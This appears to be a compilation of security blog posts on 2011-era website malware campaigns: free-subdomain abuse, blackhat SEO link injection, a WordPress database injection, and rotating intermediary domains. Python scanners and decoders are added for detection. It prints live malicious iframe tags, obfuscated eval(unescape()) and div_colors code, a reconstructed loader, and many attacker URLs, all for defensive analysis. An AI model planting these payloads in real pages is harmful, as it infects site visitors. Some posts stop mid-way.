Google blocks .co.cc, attackers are now using .co.tv

It is being reported that Google has taken action against the high number of malware sites under .co.cc (a free subdomain service, not a TLD of its own), removing more than 11 million sites from its search results.

For us this is good news, since we haven't seen anything good come out of there (only malware and spam). They did the same thing a few weeks ago, blacklisting the whole .cz.cc domain.

However, just as they blacklisted .co.cc, we started seeing the attackers switch tactics and move to other free subdomain services. The popular one now is .co.tv:

<iframe src="http://uhcmsgfq&#46co&#46tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://yswlifofj&#46co&#46tv/?go=1" width="1" height="1"></iframe> 

<iframe width="1" height="1" src="http://vmvfonc&#46co&#46tv/?go=1"></iframe>

<iframe src="http://cvfplmpsap&#46co&#46tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://kwhnqxvslf&#46co&#46tv/?go=1" width="1" height="1"></iframe>

Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have pointed to .co.cc). Note the width="1" height="1": the frame is a single pixel, invisible to the visitor, while the browser still loads whatever the remote page serves. As you can see from the names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc.), they are random and mass generated.

We are also seeing a lot of malware and spam in the .co.be range (like dumoxoveba21.co.be), but it seems Google has banned the whole .co.be range as well.

What Google is doing is good, but the “war” is not over :)


If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.

Google blacklisted all the .cz.cc domains

It seems that Google has just blacklisted every site under the .cz.cc parent domain (including nic.cz.cc, start.cz.cc and all the others). On their Safe Browsing diagnostic page Google says:

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, cz.cc appeared to function as an intermediary for the infection of 13788 site(s) including uniform-net.jp/, nuxi-navi.com/, flashracingonline.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 47193 domain(s), including razym.ru/, discuss.com.hk/, lnk.by/.

So according to Google, it infected more than 47 thousand domains. It is interesting because in the last few months the .cc TLD (mostly through free subdomain services like .co.cc and .cz.cc) has been the most used by attackers, but it seems that Google decided to just blacklist everything under .cz.cc, legitimate subdomains included (probably by mistake).

You can see this warning by checking the diagnostic page on Google for any site ending in .cz.cc: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://anysite.cz.cc/ :

What is the current listing status for cz.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2907 time(s) over the past 90 days.

We will post more details if we hear back from Google.

TheWebbyAwards hacked and compromised with Blackhat SEO

The Webby Awards web site (www.webbyawards.com/) is currently hacked and being used for blackhat SEO. If you search for it on Google you will get a warning saying "This site may be compromised":

And if you look at the source code of the page, you will see thousands of hidden spam links (about buying Windows Vista, Office, etc.) pointing to gl.iit.edu:8080, www.korea.edu, www.gefassembly.org, www.ncsconline.org and car.dost.gov.ph. Yes, all "important", high-PageRank sites (two universities, a .gov.ph site, etc.). The odd paths on the targets (a script under /administrator/modules/ on one, a dot-file under /libraries/phpgacl/ on another) suggest those sites are compromised too and hosting the doorway pages:

<a href="http://gl.iit.edu:8080/id=8085=WHERE-CAN-I-BUY-WINDOWS-7.html">where can i buy windows 7</a>..

<a href="http://gl.iit.edu:8080/id=1974=BUY-MICROSOFT-OFFICE-2007-FOR.html">buy microsoft office 2007 for windows</a>

<a href="http://www.korea.edu/m02/m02_06_03.php?3142=Windows-Vista-Price.php">windows vista price at targe..

<a href="http://www.gefassembly.org/administrator/modules/mod_title/mod_title.php?id=3387=COMPRAR-OFFICE-2007.aspx">comprar office 200..

<a href="http://car.dost.gov.ph/libraries/phpgacl/.gacl.php?5656=Windows-7-Ultimate-(64-Bit).php">cheap upgrade to windows ..

If you search on Google for some of these terms (like "windows vista price at targe"), you will already see webby.aol.com (webbyawards.com) on the first pages of results (along with some .gov and .edu web sites).

We have no details on how it was compromised yet, but we will keep you posted (if we hear back from them). If you are a site owner, take this as a reminder to keep all your sites updated, using good passwords, monitored and following best practices.
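Both the 1x1 iframes from the .co.tv post above and the hidden spam links on webbyawards.com can be picked up with the same pass over a page's HTML. The scanner below is an added example for this page (not SiteCheck or any code from the posts): it walks the markup with Python's html.parser, flags iframes that are one pixel or styled invisible, flags anchors whose target is off-site and whose link text reads like sales spam, and applies a crude vowel-ratio heuristic to spot mass-generated hostnames. The sample page, the spam word list and the free-subdomain-service list are constructed from the domains and links quoted in the posts; the 25% vowel threshold and the 1 px cut-off are assumptions of the example.

```python
"""Scan a page for hidden iframes and injected spam links.
Added example (not Sucuri's scanner); SAMPLE_PAGE is constructed from
the iframes and links quoted in the posts."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Free subdomain / dynamic DNS services named in the posts (assumed list).
FREE_SUBDOMAIN_SERVICES = ("co.cc", "cz.cc", "co.tv", "co.be", "rr.nu",
                           "myfw.us", "uni.cc", "xe.cx", "mooo.com")
# Words seen in the injected link text above (assumed, not exhaustive).
SPAM_WORDS = {"buy", "cheap", "price", "comprar", "windows", "office", "upgrade"}
WWW_PREFIX = re.compile(r"^www\d*\.")


def free_service(host):
    """Return the free-subdomain service a host sits under, or None."""
    host = host.lower()
    return next((s for s in FREE_SUBDOMAIN_SERVICES
                 if host == s or host.endswith("." + s)), None)


def domain_is_random(host):
    """Crude generated-name check: first label (after any wwwN.) of 6+
    letters with under 25% vowels. Flags vmvfonc / kwhnqxvslf, not webbyawards."""
    label = WWW_PREFIX.sub("", host.lower()).split(".")[0]
    letters = [c for c in label if c.isalpha()]
    if len(letters) < 6:
        return False
    return sum(c in "aeiou" for c in letters) / len(letters) < 0.25


def _is_hidden(attrs):
    """1x1 (or 0x0) dimensions, or an inline style that hides the element."""
    def tiny(v):
        return re.sub(r"px$", "", v.strip().lower()) in {"0", "1"}
    style = attrs.get("style", "").replace(" ", "").lower()
    dims = (attrs.get("width", ""), attrs.get("height", ""))
    return (all(tiny(d) for d in dims) or "display:none" in style
            or "visibility:hidden" in style)


class InjectionScanner(HTMLParser):
    """Collects findings. html.parser decodes character references in
    attribute values, so src="http://x&#46co&#46tv/" is seen as x.co.tv,
    exactly as a browser would see it."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._href = None       # href of the <a> we are inside, if any
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe" and _is_hidden(a):
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            self.findings.append({"kind": "hidden-iframe", "host": host,
                                  "random_label": domain_is_random(host),
                                  "free_service": free_service(host)})
        elif tag == "a":
            self._href, self._text = a.get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            host = (urlparse(self._href).hostname or "").lower()
            text = " ".join(self._text).lower().strip()
            words = set(re.findall(r"[a-z]+", text))
            if host and host != self.site_host and words & SPAM_WORDS:
                self.findings.append({"kind": "spam-link", "host": host,
                                      "text": text})
            self._href = None


def scan(page_html, site_host):
    """Return the list of findings for one page of HTML."""
    p = InjectionScanner(site_host)
    p.feed(page_html)
    p.close()
    return p.findings


# Constructed sample: a legitimate link and a normal embed, plus two of the
# .co.tv iframes and two of the Webby Awards spam links quoted in the posts.
SAMPLE_PAGE = """<html><body>
<a href="http://www.example-site.com/about.html">About us</a>
<iframe src="http://uhcmsgfq&#46co&#46tv/?go=1" width="1" height="1"></iframe>
<iframe width="1" height="1" src="http://kwhnqxvslf&#46co&#46tv/?go=1"></iframe>
<div style="display:none">
<a href="http://gl.iit.edu:8080/id=8085=WHERE-CAN-I-BUY-WINDOWS-7.html">where can i buy windows 7</a>
<a href="http://www.korea.edu/m02/m02_06_03.php?3142=Windows-Vista-Price.php">windows vista price</a>
</div>
<iframe src="http://player.example.org/embed/1" width="560" height="315"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in scan(SAMPLE_PAGE, "www.example-site.com"):
        print(f)
```

The hostname heuristic is only a triage hint (a short or dictionary-word label slips past it), so treat the 1x1 geometry and the free-subdomain suffix as the stronger signals and review any hit by hand.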


Site hacked? Infected with malware or spam? We are here to help.

Mass infections – globalpoweringgathering.com

We first detected malware from globalpoweringgathering.com almost a month ago and posted about it on our blog. But in the last few days we have seen a big increase in the number of sites infected with it.

We have cataloged almost 3 thousand sites with this malware, and Google lists almost 2 thousand on its Safe Browsing page (a number growing every day; just yesterday it was under 1 thousand):

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 1815 domain(s), including clonestop.com/, warseer.com/, showbiz411.com/.



CBS Money Watch / ZDnet hacked and blacklisted by Google

We are getting reports that CBS MoneyWatch and some ZDNet web sites are currently distributing malware and have been blacklisted by Google. We are still investigating, but if you try to visit the CBS MoneyWatch site (moneywatch.com) you will get a warning from Google:




Ask Sucuri: How long does it take for a site to be removed from Google's blacklist?

If you have any questions about malware, blacklisting, or security in general, send them to us at contact@sucuri.net and we will answer them here. For all the "Ask Sucuri" answers, go here.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean, however, it is still blacklisted by Google. How long until they remove us?

This is a very common question. In fact, every time we clean a hacked site, the owner asks us the same thing: how long until that scary red warning is gone?

To give our clients a solid answer, over the last few months we have been timing how long it takes from when the review is requested until the site is removed by Google. We have now timed more than 500 blacklist removals, so I think we have good numbers to back us up.

Here are the results:

Database injection, lessthenaminutehandle.com and more updates

We posted a few weeks ago about a large scale database injection attack affecting WordPress on shared hosts. The infected sites had the following JavaScript malware inserted into every post in their database (the wp_posts table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Which, once decoded, writes a script tag that loads the following link: lessthenaminutehandle.com/js.php?kk=33

We also saw multiple variations of it, where the following domains were used as the main intermediaries:

http://lessthenaseconddeal.com/ll.php?k=09

globalpoweringgathering.com
lessthenaminutehandle.com
lessthenaseconddeal.com
welcometotheglobalisnet.com

What is interesting is the number of sub-intermediaries, which change every few hours:

antivir1.mooo.com
antivirus-3654.co.cc
aqfwbngy.co.cc
defender-dyxa.co.cc
defender-kwwh.in
defender-wqga.in
defender-wtln.co.cc
pfoencut.co.cc
software-wujy.co.cc
system-scanner-ryes.co.cc
system-scanner-uemo.co.cc
system-scanner-uotu.co.cc
zgfozmcr.co.cc
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.powernhgmdftkcleaner.myfw.us
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.smartsystemscanro.myfw.us
www3.specialprotectionti.rr.nu
www3.strongcheckera.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.avguardianpp.myfw.us
www4.avguardianst.myfw.us
www4.bestuhzscanner.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.strong-oppinternet.in
www4.thebestcheckernar.myfw.us
www4.top-only-scanner.uni.cc

They are using hosts under multiple TLDs (.net, .com, .in, .us, etc.), most of them on free subdomain and dynamic DNS services (.co.cc, .rr.nu, .myfw.us, .uni.cc), and rotating them every hour. The most common networks hosting them are 65.23.153.0/24 and 46.252.130.0/24, but that changes often as well. We will keep you posted as we track them...



If your site is infected with malware or blacklisted, we are here to help.

The “div_colors” Malware Update

We are still seeing big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, unsure what to do and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and adds the following obfuscated code to the pages:

if (typeof(redef_colors)=="undefined") {
var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');..

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {
..



Will Google blacklist itself?

We were analyzing an infected site today and their Google blacklist diagnostic said the following:

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 3 domain(s), including site.com/, google.com/.

Hmm... so google.com was somehow infected as well? I know it is probably some small sub-site within Google, but I found it interesting that they listed Google's main domain there.

If you look at Google’s own diagnostic page, it says:

31 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-03-28, and the last time suspicious content was found on this site was on 2011-03-28.

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, google.com appeared to function as an intermediary for the infection of 71 site(s) including our-pretty-pets.blogspot.com/, daum.net/, portovelhodownload.blogspot.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 72 domain(s), including tamansoftware.co.cc/, agusnih.co.cc/, duniamisteri.co.cc/.

Let’s see if Google actually blacklists themselves :)

Database injection and lessthenaminutehandle.com – Intermediary domains

We posted a few days ago about a large scale database injection attack affecting shared hosts. The infected sites had the following JavaScript malware inserted into every post in their database (the wp_posts table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Which, once decoded, writes a script tag that loads the following link: lessthenaminutehandle.com/js.php?kk=33
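The eval(unescape("%64%6F...")) loader quoted here and in the later update on the same injection is decoded below; this is an added example for the page, not Sucuri's cleanup code. The two fragments the posts show decode to "document.wr" and p?kk=33"></script>');, so the full loader is a document.write() of a script tag; SAMPLE_POST is constructed here with the same per-character %XX encoding, since the posts do not show the middle of the real string. The decoder mirrors JavaScript's unescape() rather than using urllib.parse.unquote, because unescape() also accepts %uXXXX sequences that unquote does not understand, a switch attackers can make at no cost.

```python
"""Decode eval(unescape("...")) injections in post content and pull out
the script URLs they load. Added example, not code from the posts;
SAMPLE_POST is constructed (the posts show only the head and tail of
the real encoded string)."""
import re

EVAL_UNESCAPE = re.compile(
    r'eval\s*\(\s*unescape\s*\(\s*(["\'])(.*?)\1\s*\)\s*\)', re.S)
SCRIPT_SRC = re.compile(r'<script[^>]*?\ssrc\s*=\s*["\']?([^"\'\s>]+)', re.I)


def js_unescape(s):
    """Mirror JavaScript's unescape(): %XX *and* %uXXXX sequences.
    urllib.parse.unquote only handles %XX, so a decoder built on it would
    miss a payload encoded as %u0064%u006F..."""
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def find_injections(post_content):
    """One record per eval(unescape()) call: the decoded JavaScript and any
    <script src=...> URLs it writes. Decoding only; the code is never run."""
    out = []
    for m in EVAL_UNESCAPE.finditer(post_content):
        decoded = js_unescape(m.group(2))
        out.append({"decoded": decoded, "urls": SCRIPT_SRC.findall(decoded)})
    return out


def _encode_like_attacker(text):
    """Every character as %XX, the way the injected snippet was encoded."""
    return "".join("%%%02X" % ord(c) for c in text)


# Reconstructed loader: consistent with the decoded head ("document.wr")
# and tail (p?kk=33"></script>');) visible in the posts.
LOADER = ("document.write('<script src=\"http://lessthenaminutehandle.com"
          "/js.php?kk=33\"></script>');")
# Constructed sample post: a normal paragraph followed by the injected tag.
SAMPLE_POST = ("<p>Regular post body.</p>\n<script>eval(unescape(\""
               + _encode_like_attacker(LOADER) + "\"))</script>")

if __name__ == "__main__":
    for rec in find_injections(SAMPLE_POST):
        print(rec["decoded"])
        print("loads:", rec["urls"])
```

When cleaning a database, a query such as SELECT ID FROM wp_posts WHERE post_content LIKE '%eval(unescape(%' (assumed table name; prefix may differ per install) narrows the rows to feed through find_injections(), and the extracted URLs are what you add to your blocklist and submit with the Safe Browsing review.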

Nothing much different from other web-based malware we have been tracking. What is interesting about this attack is how fast the intermediary domains change to avoid detection and blacklisting.

These are just some of the ones used in the last 24 hours:

http://defender-dyxa.co.cc/scan1/188

http://antivirus-3879.co.cc/scan1/188

http://antivirus-9465.co.cc/scan1/188

http://antivirus-4274.co.cc/scan1/188

http://yquwtuog.co.cc/scan1/188

http://mrxzvtwt.co.cc/scan1/188

http://lowoxnsm.co.cc/scan1/188

http://iuhcypsp.co.cc/scan1/188

http://vycdmonz.co.cc/scan1/188

http://zgfozmcr.co.cc/scan1/188

http://www4.personaldzfnetwork.rr.nu/?6276f6d=m%2BzgmGuilqSsld7K0KGtjOLZ4LTTo6Rj06Jmo6lqa1s%3D

http://www4.bestuhzscanner.rr.nu/?40ee785=m%2BzgmGuUlqWtm9jj16CUlOLZ3mumo2WjqGRkmp1qbFk%3D

http://www4.savezuzarmy.rr.nu/?47f2246dec=m%2BzgmGulkqieoOXjxa%2Bgn6Lm3muipmtsmWJmaW6XmYc%3D

http://www4.protection-leaderro.xe.cx/?ada145=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KkZKjLY5mpwog%3D

http://www4.protection-leaderri.xe.cx/?55db81=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KeZKjLY5mpllk%3D

http://www4.strongnm-network.rr.nu/?38fdf=m%2BzgmGulpaSolNfX0Wqhi%2Bjr26%2FOX9inY56saJyWlIo%3D

http://www3.personal-tcsoft.rr.nu/?7660a2=m%2Bzgl2uilqSsld7K0Gqniefj0rGRo9hjo6Vua5pgkVY%3D

www3.strongcheckera.rr.nu
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.specialprotectionti.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc

As you can see, they rotate across .co.cc, .cz.cc, .in, .rr.nu, .xe.cx, .uni.cc and even a few .com and .net domains. Most of them are hosted at 46.252.130.200, but the IP address changes as well. Checking them against Google, none of them has been blacklisted, showing that the tactic works.
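With hosts rotating hourly (this post and the later update list dozens of them), blocking individual hostnames does not keep up. The example below, added for this page and not Sucuri's tracking code, collapses a feed of (hostname, IP) observations into units that survive the next rotation: the /24 netblocks the posts name, and the free subdomain services (co.cc, rr.nu, myfw.us, ...) under which a fresh random name costs the attacker nothing, while registered domains are listed individually. The hostnames come from the lists above; only 46.252.130.200 appears in the posts, so the other addresses are constructed inside the two netblocks the posts name, and the minimum of two hosts per block is an assumption.

```python
"""Collapse rotating intermediary hosts into units worth blocking.
Added example, not Sucuri's tracking code. Hostnames are from the posts;
IPs other than 46.252.130.200 are constructed within the named /24s."""
import ipaddress
import re

# Free subdomain / dynamic DNS services seen in the host list (assumed list).
FREE_SUBDOMAIN_SERVICES = ("co.cc", "cz.cc", "rr.nu", "myfw.us", "uni.cc",
                           "xe.cx", "mooo.com")
WWW_PREFIX = re.compile(r"^www\d*\.")


def blocking_unit(host):
    """Narrowest unit that is still valid after the next rotation.
    A host under a free subdomain service collapses to the service itself;
    a registered domain is returned without its www3./www4. prefix."""
    host = host.lower().rstrip(".")
    for svc in FREE_SUBDOMAIN_SERVICES:
        if host == svc or host.endswith("." + svc):
            return svc, "service"
    return WWW_PREFIX.sub("", host), "domain"


def summarize(observations, min_hosts=2):
    """observations: iterable of (hostname, ip). Returns recommendations
    sorted by how many distinct hosts each covers: /24 netblocks and free
    services seen with min_hosts or more hosts, plus every registered
    domain individually (those are cheap to list one by one)."""
    seen = {}  # (kind, value) -> set of hostnames it covers
    for host, ip in observations:
        net = ipaddress.ip_network(f"{ip}/24", strict=False)
        unit, scope = blocking_unit(host)
        seen.setdefault(("netblock", str(net)), set()).add(host)
        seen.setdefault((scope, unit), set()).add(host)
    recs = [{"kind": k, "value": v, "hosts": len(h)}
            for (k, v), h in seen.items()
            if k == "domain" or len(h) >= min_hosts]
    return sorted(recs, key=lambda r: (-r["hosts"], r["kind"], r["value"]))


# Constructed observations: hostnames from the posts, IPs in the named /24s.
OBSERVED = [
    ("defender-dyxa.co.cc", "46.252.130.200"),
    ("antivirus-3654.co.cc", "46.252.130.200"),
    ("zgfozmcr.co.cc", "46.252.130.201"),
    ("www3.first-guardul.cz.cc", "46.252.130.202"),
    ("www4.bestuhzscanner.rr.nu", "46.252.130.203"),
    ("antivir1.mooo.com", "46.252.130.204"),
    ("www3.powerkbsentinel.rr.nu", "65.23.153.10"),
    ("www4.avguardianpp.myfw.us", "65.23.153.11"),
    ("defender-kwwh.in", "65.23.153.12"),
    ("antivirus-microsoft-corporation.com", "65.23.153.13"),
]

if __name__ == "__main__":
    for rec in summarize(OBSERVED):
        print(f"{rec['kind']:9} {rec['value']:40} covers {rec['hosts']} host(s)")
```

Blocking a whole free subdomain service or netblock has collateral damage (the .cz.cc post above shows what that looks like at Google's scale), so a web-proxy or egress rule built from this output should be reviewed against legitimate traffic before it goes live.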

We will post more details as we learn more.

